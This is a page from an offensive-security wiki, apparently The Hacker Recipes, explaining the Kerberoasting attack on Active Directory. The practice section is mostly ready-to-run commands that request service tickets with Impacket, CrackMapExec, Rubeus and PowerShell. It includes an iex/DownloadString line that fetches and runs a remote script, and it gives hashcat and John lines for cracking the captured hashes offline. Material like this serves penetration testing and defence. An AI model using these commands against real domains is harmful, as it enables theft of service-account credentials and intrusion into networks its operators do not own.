The Hacker Recipes
GitHubTwitterExegolTools
Search…
Introduction
Active Directory
Reconnaissance
Movement
Credentials
MITM and coerced auths
NTLM
Kerberos
Pre-auth bruteforce
Pass the key
Overpass the hash
Pass the ticket
Pass the cache
Forged tickets
ASREQroast
ASREProast
Kerberoast
Delegations
Shadow Credentials
UnPAC the hash
Pass the Certificate
sAMAccountName spoofing
SPN-jacking
DACL abuse
Group policies
🛠️ Trusts
Built-ins & settings
Netlogon
Certificate Services (AD-CS)
Exchange services
Print Spooler Service
Persistence
Web services
Reconnaissance
Configuration
Accounts and sessions
User inputs
Systems & services
Reconnaissance
Movement
Privilege escalation
Pivoting
🛠️ Physical
Locks
Networking
Machines
Super secret zones
🛠️ Intelligence gathering
CYBINT
OSINT
GEOINT
🛠️ RADIO
RFID
Bluetooth
Wi-Fi
Wireless keyboard/mouse
🛠️ mobile apps
Android
iOS
Powered By GitBook
Kerberoast
MITRE ATT&CK™ Sub-technique T1558.003

Theory

When asking the KDC (Key Distribution Center) for a Service Ticket (ST), the requesting user needs to send a valid TGT (Ticket Granting Ticket) and the SPN (Service Principal Name) of the service wanted. If the TGT is valid, and if the SPN exists, the KDC sends the ST to the requesting user.
The ST is encrypted with the requested service account's NT hash. If an attacker has a valid TGT and knows a SPN for a service, he can request a ST for this service and crack it offline later in an attempt to retrieve that service account's password.
In most situations, services accounts are machine accounts, which have very complex, long, and random passwords. But if a service account, with a human-defined password, has a SPN set, attackers can request a ST for this service and attempt to crack it offline. This is Kerberoasting.

Practice

Unlike ASREProasting, this attack can only be carried out with a prior foothold (valid domain credentials).
UNIX-like
Windows
The Impacket script GetUserSPNs (Python) can perform all the necessary steps to request a ST for a service given its SPN and valid domain credentials.
1
# with a password
2
GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DOMAIN/USER:Password'
3
4
# with an NT hash
5
GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'
Copied!
This can also be achieved with CrackMapExec (Python).
1
crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter
Copied!
Another alternative is the kerberoast pure-python toolkit.
1
python3 kerberoast spnroast kerberos+pass://"domain"\\"user":"password"@"target" -u "target_user" -r "realm"
Copied!
The same thing can be done with Rubeus from a session running with a domain user privileges.
1
Rubeus.exe kerberoast /outfile:kerberoastables.txt
Copied!
This can also be achieved with Powershell. Depending on the tool that the tester will use to attempt cracking the ???, the -OutputFormat can be set to hashcat or john.
1
iex (new-object Net.WebClient).DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1")
2
Invoke-Kerberoast -OutputFormat hashcat | % { $_.Hash } | Out-File -Encoding ASCII kerberoastables.txt
Copied!
Hashcat and JohnTheRipper can then be used to try cracking the hash.
1
hashcat -m 13100 kerberoastables.txt $wordlist
Copied!
1
john --format=krb5tgs --wordlist=$wordlist kerberoastables.txt
Copied!

Targeted Kerberoasting

If an attacker controls an account with the rights to add an SPN to another (GenericAll, GenericWrite), it can be abused to make that other account vulnerable to Kerberoast (see exploitation).
Controlling a member of the Account Operators group, targeted Kerberoasting can be conducted for the whole domain (see exploitation).

Resources

Kerberos in Active Directory
hackndo
How Attackers Use Kerberos Silver Tickets to Exploit Systems
Active Directory Security
Previous
ASREProast
Next
Delegations
Last modified 7mo ago
Copy link
Contents
Theory
Practice
Targeted Kerberoasting
Resources